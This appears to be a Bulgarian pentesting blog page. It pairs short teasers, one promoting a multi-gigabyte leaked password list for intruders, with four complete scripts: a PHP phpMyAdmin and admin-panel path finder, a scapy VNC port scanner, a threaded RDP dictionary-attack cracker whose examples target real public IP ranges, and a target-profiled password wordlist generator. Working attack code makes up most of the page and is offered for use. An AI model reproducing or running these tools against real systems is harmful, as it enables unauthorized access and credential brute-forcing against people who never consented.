WordPress Vulnerability Scan
Това е демонстрация на инструмента WPSCAN със който може да проверявате дали вашият WordPress сайт е уязвим или не.
Това е демонстрация на инструмента WPSCAN със който може да проверявате дали вашият WordPress сайт е уязвим или не.
Acunetix Web Vulnerability Scanner е уеб инструмент. Това е приложение, което ще ви помогне по-добре да защитите компютъра си и данните на него. Тази програма...
Уеб апликациите се голям проблем за сигурността на администраторите също така и за хостинг провайдърите. По какъв начин е проблем за провайдерите? Ако някой от сайтовете...
На скоро докато сърфирах попаднах на сайтове които са потрудили да съберат всички налични база дани споделени в интернет постранството! Което ми стана любопитно...
Компресиран файл на размер: 4.4gb Декомпресиран файл размер: 13gb Помислих че би било добре да споделя хубав лист за тези които гледат да проникнат...
Днеска по време на Penetration Testing, опитвах се да установя връзка със Remote Desktop сървър и попаднах на една грешка. Използва Kali Linux за...
Със този скрипт можете да сканирате за phpMyAdmin директория на даден сайт.
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 |
<html> <title>Php My Admin Finder Code by MaStErChO version 2</title> <body> <form action ="finder.php" method="post"> URL to site: <input type ="text" name="site"/> <input type = "submit" value="Find" /> </form> </body> </html> //Hack3D Team // Bulgarian Pentest Team // mastercho PhpMyAdmin page Scaner <?php $site = $_POST['site']; $list = array( '/admin/', '/login/', '/admin1.php/', '/admin.php/', '/admin.html/', '/admin1.php/', '/admin1.html/', '/login.php/', '/admin/cp.php/', '/cp.php/', '/administrator/index.php/', '/administrator/index.html/', '/administartor/', '/admin.login/', '/administrator/login.php/', '/administrator/login.html/', '/phpMyAdmin/', '/phpmyadmin/', '/PMA/', '/pma/', '/dbadmin/', '/mysql/', '/myadmin/', '/phpmyadmin2/', '/phpMyAdmin2/', '/phpMyAdmin-2/', '/php-my-admin/', '/phpMyAdmin-2.2.3/', '/phpMyAdmin-2.2.6/', '/phpMyAdmin-2.5.1/', '/phpMyAdmin-2.5.4/', '/phpMyAdmin-2.5.5-rc1/', '/phpMyAdmin-2.5.5-rc2/', '/phpMyAdmin-2.5.5/', '/phpMyAdmin-2.5.5-pl1/', '/phpMyAdmin-2.5.6-rc1/', '/phpMyAdmin-2.5.6-rc2/', '/phpMyAdmin-2.5.6/', '/phpMyAdmin-2.5.7/', '/phpMyAdmin-2.5.7-pl1/', '/phpMyAdmin-2.6.0-alpha/', '/phpMyAdmin-2.6.0-alpha2/', '/phpMyAdmin-2.6.0-beta1/', '/phpMyAdmin-2.6.0-beta2/', '/phpMyAdmin-2.6.0-rc1/', '/phpMyAdmin-2.6.0-rc2/', '/phpMyAdmin-2.6.0-rc3/', '/phpMyAdmin-2.6.0/', '/phpMyAdmin-2.6.0-pl1/', '/phpMyAdmin-2.6.0-pl2/', '/phpMyAdmin-2.6.0-pl3/', '/phpMyAdmin-2.6.1-rc1/', '/phpMyAdmin-2.6.1-rc2/', '/phpMyAdmin-2.6.1/', '/phpMyAdmin-2.6.1-pl1/', '/phpMyAdmin-2.6.1-pl2/', '/phpMyAdmin-2.6.1-pl3/', '/phpMyAdmin-2.6.2-rc1/', '/phpMyAdmin-2.6.2-beta1/', '/phpMyAdmin-2.6.2-rc1/', '/phpMyAdmin-2.6.2/', '/phpMyAdmin-2.6.2-pl1/', '/phpMyAdmin-2.6.3/', '/phpMyAdmin-2.6.3-rc1/', '/phpMyAdmin-2.6.3/', '/phpMyAdmin-2.6.3-pl1/', '/phpMyAdmin-2.6.4-rc1/', '/phpMyAdmin-2.6.4-pl1/', '/phpMyAdmin-2.6.4-pl2/', '/phpMyAdmin-2.6.4-pl3/', '/phpMyAdmin-2.6.4-pl4/', '/phpMyAdmin-2.6.4/', '/phpMyAdmin-2.7.0-beta1/', '/phpMyAdmin-2.7.0-rc1/', '/phpMyAdmin-2.7.0-pl1/', '/phpMyAdmin-2.7.0-pl2/', '/phpMyAdmin-2.7.0/', '/phpMyAdmin-2.8.0-beta1/', '/phpMyAdmin-2.8.0-rc1/', '/phpMyAdmin-2.8.0-rc2/', '/phpMyAdmin-2.8.0/', '/phpMyAdmin-2.8.0.1/', '/phpMyAdmin-2.8.0.2/', '/phpMyAdmin-2.8.0.3/', '/phpMyAdmin-2.8.0.4/', '/phpMyAdmin-2.8.1-rc1/', '/phpMyAdmin-2.8.1/', '/phpMyAdmin-2.8.2/', '/sqlmanager/', '/mysqlmanager/', '/p/m/a/', '/PMA2005/', '/pma2005/', '/phpmanager/', '/php-myadmin/', '/phpmy-admin/', '/webadmin/', '/sqlweb/', '/websql/', '/webdb/', '/mysqladmin/', '/mysql-admin/', '/mya/', ); if(isset($site)){ foreach($list as $path => $test) { $ch = curl_init(); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_HEADER, 1); curl_setopt($ch, CURLOPT_URL, $site.$test); $result = curl_exec($ch); curl_close($ch); //print $url; if (preg_match("/200 OK/", $result)){ echo "<br /> [!] w00t! w00t! Found phpMyAdmin [ $site$test ]"; } else if (preg_match("/401 Unauthorized/", $result)) { echo "<br /> [!] w00t! w00t! Found phpMyAdmin [ $site$test ]"; } else { echo "<br /> [-] Nothing found on [$site$test]"; } } } ?> |
Линк : https://github.com/mastercho/phpMyAdmin-Scanner-v2
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 |
#!/usr/bin/env python #Scans a range and prints a output list of "targets" that have the VNC port open import sys from scapy import * conf.verb=0 if len(sys.argv) != 2: print "Usage: ./vnc_scan.py <target>" print "Where <target> is a range like 192.168.1.0/24" sys.exit(1) target=sys.argv[1] p=IP(dst=target)/TCP(dport=5900, flags="S") # Making the packet :) ans,unans=sr(p, timeout=9) # Setting the timeouts :) for a in ans: if a[1].flags == 2: print a[1].src |
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 174 175 176 177 178 179 180 181 182 183 184 185 186 187 188 189 190 191 192 193 194 195 196 197 198 199 200 201 202 203 204 205 206 207 208 209 210 211 212 213 214 215 216 217 218 219 220 221 222 223 224 225 226 227 228 229 230 231 232 233 234 235 236 237 238 239 240 241 242 243 244 245 246 247 248 249 250 251 252 253 254 255 256 257 258 259 260 261 262 263 264 265 266 267 268 269 270 271 272 273 274 275 276 277 278 279 280 281 282 283 284 285 286 287 288 289 290 291 292 293 294 295 296 297 298 299 300 301 302 303 304 305 306 307 308 309 310 311 312 313 314 315 316 317 318 319 320 321 322 323 324 325 326 327 328 329 330 331 332 333 334 335 336 337 338 339 340 341 342 343 344 345 346 347 348 349 350 351 352 353 354 355 356 357 358 359 360 361 362 363 364 365 366 367 368 369 370 371 372 373 374 375 376 377 378 379 380 381 382 383 384 385 386 387 388 389 390 391 392 393 394 395 396 397 398 399 400 401 402 403 404 405 406 407 408 409 410 411 412 413 414 415 416 417 418 419 420 421 422 423 424 425 426 427 428 429 430 431 432 433 434 435 436 437 438 439 440 441 442 443 444 445 446 447 448 449 450 451 |
#! /usr/bin/env python # RDP Dictionary Attack # 21.05.2012 cmiN # # THIS SCRIPT IS INTENDED FOR PERSONAL AND LIMITED PURPOSES ONLY # I AM NOT RESPONSIBLE FOR ANY LEGAL OR ILLEGAL USE OF THIS PROGRAM # # Connect with rdesktop, xfreerdp or something similar using # servers, users and passwords from files. # After checking if the port is opened, the wrapper opens a shell console # executing the client with data from input files. In the meantime # a local socket is accepting connections from the target and if the link # is established then the user and password for that server are a match. # # You need rdesktop/xfreerdp (sudo apt-get/yum/equo install rdesktop/freerdp). # On gentoo based systems use emerge to find and install the newest packages. # Contact: cmin764@yahoo/gmail.com from sys import argv, platform from threading import Thread, active_count, Lock from subprocess import Popen from socket import * # defaults THRD = 4 # how many threads for crack phase TOUT = 6.0 # timeout in seconds # get global host ip try: sock = socket(AF_INET, SOCK_STREAM) sock.connect(("www.google.com", 80)) # assuming google works except error as excp: # error from socket (timed out or invalid server) print "Check your internet connection: %s." % excp exit() else: HOST = sock.getsockname()[0] finally: sock.close() del sock PORT = 51337 # used for local listening # attack modes RDP1 = ["rdesktop", "-u", "{user}", "-p", "{password}", "-s", "telnet {host} {port}", "-g", "1x1", "-a", "8", "-x", "m", "-z", "-m", "{server}"] RDP2 = ["xfreerdp", "-u", "{user}", "-p", "{password}", "-s", "telnet {host} {port}", "-g", "1x1", "-a", "8", "-x", "m", "-z", "--no-motion", "{server}"] VERB = False # verbose METH = "r" # RDP1 USER = ["Administrator"] SAFE = True SWTC = True LIMT = None # attacks (test only, None -> unlimited) class Engine: """Main class used to find and crack servers with desired options. For more info see usage from the bottom of the script. It executes commands through subprocess and waits for replies within timeout. """ def __init__(self, threads, timeout, host, port, rdp1, rdp2, verbose, method, usr, safe, switch): """Copy global options and prepare the core.""" self.cli = True # activate print/stdout (set to False if a GUI is used) self.threads = threads self.timeout = timeout self.host = host self.port = port self.rdp1 = rdp1 self.rdp2 = rdp2 self.verbose = verbose self.sockets = dict() # D[x] = True if x is available otherwise False self.pos = list() # list with indexes (user, password, server, telnet) self.usr = usr self.pwd = None self.srv = None # set the command used for scanning if method == "x": self.command = self.rdp2 else: self.command = self.rdp1 # default: don't save self.working = None self.cracked = None self.good = list() # rdp servers self.delete = set() # dispose of cracked servers self.lock = Lock() # global printing thread synchronization self.sock_mutex = Lock() # for localhost socket use if "linux" in platform: self.null = open("/dev/null", "w") else: self.null = open("NUL", "w") self.safe = safe self.switch = switch def __del__(self): """Destructor.""" if hasattr(self.srv, "close"): self.srv.close() if hasattr(self.usr, "close"): self.usr.close() if self.pwd: self.pwd.close() if self.working: self.working.close() if self.cracked: self.cracked.close() for sock in self.sockets: sock.shutdown(SHUT_RDWR) sock.close() def generator(self, src, dest): """Just like grandpa's old mileage meter :].""" temp = "%d.%d.%d.%d" byte = 256 yield temp % tuple(src) # yield -> the beauty of python while (src != dest): # like return but continue src[3] += 1 if src[3] == byte: src[3] = 0 src[2] += 1 if src[2] == byte: src[2] = 0 src[1] += 1 if src[1] == byte: src[1] = 0 src[0] += 1 yield temp % tuple(src) def set_threads(self, threads): self.threads = threads def set_safe(self, safe): self.safe = safe def set_switch(self, switch): self.switch = switch def set_timeout(self, timeout): self.timeout = timeout def set_verbose(self, verbose): self.verbose = verbose def set_method(self, method): if method == "x": self.command = self.rdp2 else: self.command = self.rdp1 def set_usr(self, usr): """If this is called, then the users are taken from a file.""" self.usr = open(usr, "r") # do not use the generic one def set_pwd(self, pwd): """The file with passwords is mandatory.""" self.pwd = open(pwd, "r") def set_srv(self, srv): """Make a file object or range generator from argument.""" if srv.find("-") == -1: # not found -> not range self.srv = open(srv, "r") else: chunks = srv.split("-") src, dest = chunks[0].split("."), chunks[1].split(".") for i in xrange(4): src[i] = int(src[i]) dest[i] = int(dest[i]) self.srv = self.generator(src, dest) def set_working(self, working): """Save progress in scan phase.""" self.working = open(working, "a") # safe append def set_cracked(self, cracked): """Save progress in crack phase.""" self.cracked = open(cracked, "a") def scan_server(self, server): """Check if the rdp port is opened on the specified server.""" try: # create the socket and connect sock = socket(AF_INET, SOCK_STREAM) sock.connect((server, 3389)) except error: # timed out in most cases if self.verbose: self.lock.acquire() if self.cli: print "[-] %s [NO]" % server # only with -v self.lock.release() else: # good news everyone self.lock.acquire() if self.cli: print "[+] %s [OK]" % server self.good.append(server) if self.working: self.working.write(server + "\n") self.working.flush() self.lock.release() finally: sock.close() def scan(self): """Just like a port scanner for 3389.""" setdefaulttimeout(self.timeout / 10.0) # 10% for server in self.srv: while active_count() > self.threads * 16: pass # do not exceed number of threads if self.switch: # scan them # now call the method in a separate thread Thread(target=self.scan_server, args=[server.strip()]).start() else: # or skip the scan self.good.append(server.strip()) while active_count() > 1: pass # join all def acquire_sock(self): for sock, state in self.sockets.iteritems(): if state: # available self.sockets[sock] = False # use it return sock def release_sock(self, sock): self.sockets[sock] = True def crack_server(self, command): try: # get a server self.sock_mutex.acquire() sock = self.acquire_sock() self.sock_mutex.release() command[self.pos[3]] = command[self.pos[3]].format(port=sock.getsockname()[1]) child = Popen(command, stdout=self.null, stderr=self.null) # no wait sock.accept() # here is the big overhead except error as excp: # timed out if self.verbose: self.lock.acquire() if self.cli: print "[-] %s %s %s [NO]" % (command[self.pos[2]], command[self.pos[0]], command[self.pos[1]]) self.lock.release() else: # good news again show = "%s %s %s" % (command[self.pos[2]], command[self.pos[0]], command[self.pos[1]]) self.delete.add(command[self.pos[2]]) # cracked! no need to process again self.lock.acquire() if self.cli: print "[+] " + show + " [OK]" if self.cracked: self.cracked.write(show + "\n") self.cracked.flush() self.lock.release() finally: child.kill() # do not close it, instead release it for further use self.release_sock(sock) # O(1) and can't affect the same socket def crack(self): """For each user take each password and test them with each working server.""" goodLen = len(self.good) if goodLen == 0: if self.cli: print "[!] No servers to crack." return if self.safe: # avoid deadlocks or strange behavior self.set_threads(min(self.threads, goodLen)) users = [line.strip() for line in self.usr] passwords = [line.strip() for line in self.pwd] if self.cli: print "[i] Cracking %d hosts in %fs." % (goodLen, float(len(users)) * len(passwords) * goodLen * self.timeout / self.threads) setdefaulttimeout(self.timeout) # now use the real timeout # prepare the sockets for port in xrange(self.threads): sock = socket(AF_INET, SOCK_STREAM) sock.settimeout(self.timeout) sock.bind((self.host, self.port + port)) sock.listen(1) self.sockets[sock] = True # init command template command = self.command shellIndex = command.index("telnet {host} {port}") command[shellIndex] = command[shellIndex].format(host=self.host, port="{port}") self.pos = [command.index("{user}"), command.index("{password}"), command.index("{server}"), shellIndex] attacks = 0 for user in users: command[self.pos[0]] = user for password in passwords: command[self.pos[1]] = password for server in self.good: command[self.pos[2]] = server while active_count() > self.threads: pass # do not exceed number of threads attacks += 1 if LIMT and attacks > LIMT: if self.cli: print "[!] Limit reached, buy the script." return # now call the method in a separate thread Thread(target=self.crack_server, args=[command[:]]).start() for server in self.delete: # N^2 can be reduced to NlogN with set self.good.remove(server) # and also to N with index memorization self.delete.clear() while active_count() > 1: pass # join all def parse(): at = 1 params = list() while at < argc: if argv[at] in ("-h", "--help"): print usage exit() # do not start the process elif argv[at] in ("-v", "--verbose"): app.set_verbose(True) elif argv[at] in ("-t", "--threads"): at += 1 app.set_threads(int(argv[at])) elif argv[at] in ("-T", "--timeout"): at += 1 app.set_timeout(float(argv[at])) elif argv[at] in ("-m", "--method"): at += 1 app.set_method(argv[at]) elif argv[at] in ("-w", "--working"): at += 1 app.set_working(argv[at]) elif argv[at] in ("-c", "--cracked"): at += 1 app.set_cracked(argv[at]) elif argv[at] in ("-s", "--safe-off"): app.set_safe(False) elif argv[at] in ("-n", "--no-scan"): app.set_switch(False) else: if argv[at][0] == "-": raise Exception("Invalid option") params.append(argv[at]) at += 1 pLen = len(params) if pLen not in (2, 3): raise Exception("Invalid number of parameters") app.set_srv(params[-1]) app.set_pwd(params[-2]) if pLen == 3: app.set_usr(params[-3]) # same index as 0 def main(): try: if argc == 1: # show a message or start the GUI which is missing :) print "You should run: %s --help" % argv[0] exit() # or parse the arguments parse() # and start the scanner print "[i] Scan phase started." app.scan() # filter the input for working rdp servers print "[i] Crack phase started." app.crack() # crack them except Exception as excp: print "[x] Error: %s." % excp except KeyboardInterrupt: print "[!] Stopped." else: print "[i] Finished." if __name__ == "__main__": argc = len(argv) usage = """ Usage: {0} [options] [usr] pwd srv Options: -t, --threads <number> number of threads (parallel connections) -s, --safe-off by default the number of threads is reduced to the number of working servers if it's greater use this option to keep the number of threads -T, --timeout <seconds> waiting response time for each connection -m, --method <r/x> use [r]desktop or [x]freerdp -w, --working <file> file used to store servers with 3389 opened -c, --cracked <file> file used to store cracked servers -n, --no-scan skip scan phase asumming all servers are working rdps -v, --verbose show extra information (default off) -h, --help show this help Parameters: usr users file (default users: {1}) pwd passwords file srv servers file or range (abc.def.ghi.jkl-mno.pqr.stu.vwx) Examples: {0} -c cracked.txt passwords.txt 68.195.205.60-68.195.211.60 {0} -w good.txt --timeout 2 -s pass.txt 91.202.91.119-91.202.94.15 {0} -t 256 -T 5 -v -c cracked.txt -n users.txt pass.txt good.txt Users, passwords and working servers are loaded into memory. Be aware to not open a file for both read and write. More exactly do not use the same file name with `-w`/`-c` and `srv`. THIS SCRIPT IS INTENDED FOR PERSONAL AND LIMITED PURPOSES ONLY I AM NOT RESPONSIBLE FOR ANY LEGAL OR ILLEGAL USE OF THIS PROGRAM Send bugs to cmin764@yahoo/gmail.com. """.format(argv[0], USER) app = Engine(THRD, TOUT, HOST, PORT, RDP1, RDP2, VERB, METH, USER, SAFE, SWTC) main() del app |
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 174 175 176 177 178 179 180 181 182 183 184 185 186 187 188 189 190 191 192 193 194 195 196 197 198 199 200 201 202 203 204 205 206 207 208 209 210 211 212 213 214 215 216 217 218 219 220 221 222 223 224 225 226 227 228 229 230 231 232 233 234 235 236 237 238 239 240 241 242 243 244 245 246 247 248 249 250 251 252 253 254 255 256 257 258 259 260 261 262 263 264 265 266 267 268 269 270 271 272 273 274 275 276 277 278 279 280 281 282 283 284 285 286 287 288 289 290 291 292 293 294 295 296 297 298 299 300 301 302 303 304 305 306 307 308 309 310 311 312 313 314 315 316 317 318 319 320 321 322 323 324 325 326 327 328 329 330 331 332 333 |
#!/usr/bin/env python __author__ = 'irenicus09' __email__ = 'irenicus09[at]gmail[dot]com' __license__ = 'BSD' __version__ = 'BETA' __date__ = '18/05/2013' import sys """ ############################## GEN2K #################################### Automated Word List Generator > Generates passwords combinations by combining words from wordlist. > Covers frequently used number patterns used along with words. > Generates passwords combinations using year/date combo. > Generates custom user defined value(s) combination with word list. > Option to auto convert words to upper/lowercase & capitalisation. > WPA/WPA2 password validation check. > No external dependencies. --------------------------------------------------------------------------- HINTS: * DO NOT USE A GENERAL PURPOSE WORDLIST * SUPPLIED WORDLIST MUST ONLY CONTAIN KNOWN FACTS ABOUT TARGET E.G NAMES, ADDRESS, FAVORITE ARTIST, PLACE, EVENT, ETC. * TRY TO KEEP WORDLIST AT A MINIMUM, DON'T INCLUDE TOO MUCH DETAILS * THE FINAL GENERATED WORD LIST CAN GET EXTREMELY LARGE! ########################################################################### """ def help(): print """ ###### ######## ## ## ####### ## ## ## ## ## ### ## ## ## ## ## ## ## #### ## ## ## ## ## #### ###### ## ## ## ####### ##### ## ## ## ## #### ## ## ## ## ## ## ## ### ## ## ## ###### ######## ## ## ######### ## ## %s ======= Automated Word List Generator ======= Copyright (C) irenicus09 2013 USAGE: ./gen2k.py -w <wordlist> -o <output> [options] [ -c ] Enable word combination among the words in wordlist. [ -d ] Custom comma separated values to combine with wordlist. [ -e ] Enable wpa/wpa2 fitness check for generated passwords. [ -h ] Prints this help. [ -n ] Enable frequently used number combination with wordlist. [ -o ] Output filename. [ -w ] Path to word list file. Wordlist must contain info related to Target. [ -y ] Enable year combination with wordlist. [ -z ] Enable conversion of words to upper & lower case letters. Note: Conversion to upper/lowercase & capitalisation takes place before other modes are applied to the original list. """ % __version__ def main(): if exist('-h'): help() sys.exit(0) if not (exist('-w') or exist('-o')): help() sys.exit(1) master_list = load_words(find('-w')) # List supplied by user data = [] # Final wordlist temp = [] # Temporary wordlist if exist('-z'): master_list = gen_case(master_list) data = master_list if exist('-c'): temp = gen_word_combo(master_list) data = list(set(temp+data)) if exist('-n'): temp = gen_numbers(master_list) data = list(set(temp+data)) if exist('-y'): temp = gen_year(master_list) data = list(set(temp+data)) if exist('-d'): try: custom_values = find('-d').split(',') except (AttributeError): print '[!] Are you kidding me with no values?' sys.exit(1) temp = gen_custom(master_list, custom_values) data = list(set(temp+data)) if exist('-e'): data = wpa_validation_check(data) write_file(find('-o'), data) print '[*] Total words generated: %d' % (len(data)) sys.exit(0) def merge_list(temp_list=[], final_list=[]): """ Merges contents from temp_list (1st param) with final_list (2nd param) """ for word in temp_list: if word not in final_list: final_list.append(word) def load_words(path_to_file): """ Function to fetch all possible words. """ data = [] try: handle = open(path_to_file, 'r') temp_list = handle.readlines() handle.close() except(BaseException): print '[!] Error occured while reading wordlist.' sys.exit(1) for word in temp_list: word = word.strip() if word != '': data.append(word) return data def write_file(path_to_file, data=[]): """ Writing to specified file. """ try: handle = open(path_to_file, 'wb+') for word in data: handle.write(word+'\n') handle.close() except(BaseException): print '[!] Error occured while writing to file.' sys.exit(1) def gen_case(words=[]): """ Function to change words to Upper & Lower case. """ custom_list = [] for x in words: custom_list.append(x.lower()) custom_list.append(x.capitalize()) custom_list.append(x.upper()) return list(set(custom_list)) def gen_numbers(words=[]): """ Function to mix words with commonly used numbers patterns. """ word_list = [] if len(words) <= 0: return word_list num_list = ['0', '01', '012', '0123', '01234', '012345', '0123456', '01234567', '012345678', '0123456789', '1', '12', '123', '1234','12345', '123456','1234567','12345678','123456789', '1234567890', '9876543210', '987654321', '87654321', '7654321', '654321', '54321', '4321', '321', '21'] for word in words: for num in num_list: word_list.append((word+num)) word_list.append((num+word)) return word_list def gen_year(words=[]): """ Function to mix auto generated year with words from wordlist. Hint: Date of birth & special dates are often combined with certain words to form passwords. """ word_list = [] if len(words) <= 0: return word_list # Double digit dates start = 1 while(start <= 99): for word in words: word_list.append(word + str("%02d") % (start)) word_list.append(str("%02d") % start + word) start += 1 # Four digit dates start = 1900 while (start <= 2020): for word in words: word_list.append(word+str(start)) word_list.append(str(start)+word) start += 1 return word_list def gen_word_combo(words=[]): """ Function to mix multiple words from given list. """ word_list = [] if len(words) <= 1: return word_list for word in words: for second_word in words: if word != second_word: word_list.append(second_word+word) return word_list def gen_custom(words=[], data=[]): """ Funtion to combine user defined input with wordlist. > Takes a comma separated list via cmdline as values. """ word_list = [] if (len(words) <= 0 or len(data) <= 0): return word_list for item in data: for word in words: word_list.append(item+word) word_list.append(word+item) return word_list def wpa_validation_check(words=[]): """ Function to optimise wordlist for wpa cracking > Removes Duplicates. > Removes passwords < 8 or > 63 characters in length. """ custom_list = list(set(words)) custom_list = [x for x in custom_list if not (len(x) < 8 or len(x) > 63)] return custom_list # S3my0n's argument parsers, thx brah :) def find(flag): try: a = sys.argv[sys.argv.index(flag)+1] except (IndexError, ValueError): return None else: return a def exist(flag): if flag in sys.argv[1:]: return True else: return False if __name__ == '__main__': main() |